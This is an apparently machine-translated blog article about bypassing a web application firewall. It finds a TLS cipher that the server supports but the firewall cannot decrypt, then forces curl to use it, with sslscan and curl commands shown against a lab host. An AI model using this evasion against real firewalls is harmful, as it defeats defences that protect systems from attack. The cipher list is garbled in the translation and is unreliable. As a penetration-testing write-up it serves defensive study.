Shulou(Shulou.com)05/31 Report--

This article introduces how to bypass the Web application firewall by abusing SSL and TLS, the content is very detailed, interested friends can refer to, hope to be helpful to you.

Introduction

In recent years, Web security has gradually become a very important part of IT security field. The advantage of Web applications is that developers can integrate a variety of key services in a short time, and maintenance is much less difficult than traditional desktop applications. In addition to designing new Web standards, the security requirements of enterprises for Web applications are also changing. We will introduce you to a new bypass technology for firewalls.

Loophole background

Recently, I tested the network firewall of a company, and the infrastructure deployed by the company is as follows:

When I get the data information I need, I intend to try some different bypass methods to conduct penetration testing of its infrastructure. In addition to some regular WAF testing methods, I'm going to use SSL Cypher to bypass WAF. When I first logged in to WAF, the system popped up a "Unsupported SSL Ciphers" warning, which was very interesting. After looking at the detailed product documentation, I got all the SSL Cypher supported by the device, but before I started, I wanted to give you a brief introduction to how SSL connections work.

The SSL handshake consists of the following three main steps:

ClientHello/ServerHello stage

The handshake process begins with a ClientHello message sent by the client, which contains all the information needed by the server. The server responds to a ServerHello message after receiving the connection message, which contains the information needed by the client. In addition, the server returns the relevant Cypher suite version and SSL version that you need to use.

Certificate exchange

After the connection is initialized, the server needs to provide authentication information to the client, and the server sends the SSL certificate to the client. The client verifies the authenticity of the certificate, determines whether the certificate can be trusted, and then continues to complete the connection.

Key exchange

When the secure channel is successfully established, the server and the client exchange keys for encrypting and decrypting the data.

Attack thought

My attack idea is as follows: if I use a SSL Cypher that is "not supported by WAF" to initialize a connection with the target Web server, and the Web server actually supports this version of Cypher, then WAF will not recognize my attack because it cannot see the real request data.

Therefore, after looking at the detailed technical documentation provided by the firewall vendor, I extracted all the supported SSL Cypher, as shown below.

SSLv3SSL_RSA_WITH_NULL_MD5SSL_RSA_WITH_NULL_SHASSL_RSA_WITH_RC4_128_MD5SSL_RSA_WITH_RC4_128_SHASSL_RSA_WITH_DES_CBC_SHASSL_RSA_WITH_3DES_EDE_CBC_SHASSL_RSA_EXPORT_WITH_RC4_40_MD5SSL_RSA_EXPORT_WITH_DES40_CBC_SHATLS/1.0-1.2 TLSwith null SHA256TLSwith AES128, CBC with SHATLSRSALSwith NULLS256 _ CBC_SHATLS_RSA_EXPORT1024_WITH_RC4_56_MD5TLS_RSA_EXPORT1024_WITH_RC4_56_SHATLS_RSA_WITH_AES_128_CBC_SHA256TLS_RSA_WITH_AES_256_CBC_SHA256TLS_RSA_WITH_RC4_128_MD5= {0x000x04} TLS_RSA_WITH_RC4_128_SHA= {0x000x05} TLS_RSA_WITH_DES_CBC_SHA= {0x000x09}

The next thing to do is to identify the SSL Cypher supported by the target Web server. There are many ways to do this, but I chose to use sslscan because it is easy to install and provides a lot of detailed data.

Pwn@thinkpad:~$sudo apt install sslscanReadingpackage lists... DoneBuildingdependency tree Readingstate information... DoneThefollowing NEW packages will be installed: sslscan0upgraded, 1 newly installed, 0 to remove and 0 not upgraded.Needto get 26,7 kB of archives.Afterthis operation 81 kB of additional disk space will be used.Get:1 http://al.archive.ubuntu.com/ubuntu bionic/universe amd64 sslscan amd641.11.5-rbsec-1.1 [26 kB 7 kB] Fetched26,7 kB in 0s (73 kB/s 8 kB/s) Selectingpreviously unselected package sslscan. (Readingdatabase... 177002 files and directories currently installed.) Preparingto unpack... / sslscan_1.11.5-rbsec-1.1_amd64.deb. Unpackingsslscan (1.11.5-rbsec-1.1). Processingtriggers for man -db (2.8.3-2)... Settingup sslscan (1.11.5-rbsec-1.1)... pwn@thinkpad:~$sslscan http://target/ | grep Accept

The above command enumerates all SSL/TLS versions supported by the target Web server, as well as Cypher. After comparing the scan results of sslscan with the product documentation data, I found the Cypher that the Web application firewall does not support but the Web server supports:

Accepted TLSv1 256 bits ECDHE-RSA-AES256-SHA

To test whether my attack is correct, I created a WAF rule that blocks network requests with a request path of / ssl-cipher-test.

After accessing this path, the connection is successfully blocked:

The fastest way to take advantage of this bypass technique is to specify the Cypher used by the client, leaving only one. You can use the "- ciphers" command of curl to specify the Cypher you want to use, here I specify to use ECDHE-RSA-AES256-SHA:

Pwn@thinkpad:~$curl-- ciphers ECDHE-RSA-AES256-SHA https://waf-test.lab.local/ssl-cipher-test HELLO

Bypass worked

Pwn@thinkpad:~$

As you can see from the response message, we have successfully bypassed the Web application firewall.

On how to abuse SSL and TLS to bypass the Web application firewall to share here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.